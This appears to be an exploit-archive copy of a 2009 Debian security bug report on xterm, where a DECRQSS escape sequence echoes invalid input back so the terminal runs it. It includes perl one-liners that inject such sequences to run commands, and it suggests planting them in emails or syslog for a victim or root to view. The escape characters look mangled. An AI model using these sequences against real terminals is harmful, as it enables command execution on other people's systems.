Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability
# Published : 2009-01-06
# Author : Paul Szabo
# Previous Title : Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
# Next Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit

Package: xterm
Version: 222-1etch2
Severity: grave
Tags: security patch
Justification: user security hole


DECRQSS Device Control Request Status String "DCS $ q" simply echoes
(responds with) invalid commands. For example,
perl -e 'print "eP$qnbad-commandne\"'
would run bad-command.

Exploitability is the same as for the "window title reporting" issue
in DSA-380: include the DCS string in an email message to the victim,
or arrange to have it in syslog to be viewed by root.

Original:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030

Test:

perl -e 'print "eP$qnwhoamine\"' > bla.log
cat bla.log

If whoami gets executed you should update. 

# www.Syue.com [2009-01-06]